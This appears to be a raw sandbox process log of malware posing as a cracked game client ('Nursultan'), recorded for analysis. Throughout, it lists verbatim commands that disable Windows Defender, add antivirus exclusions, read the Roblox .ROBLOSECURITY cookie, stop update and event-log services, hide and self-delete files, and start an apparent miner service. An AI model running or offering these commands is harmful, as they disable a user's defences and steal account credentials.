C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

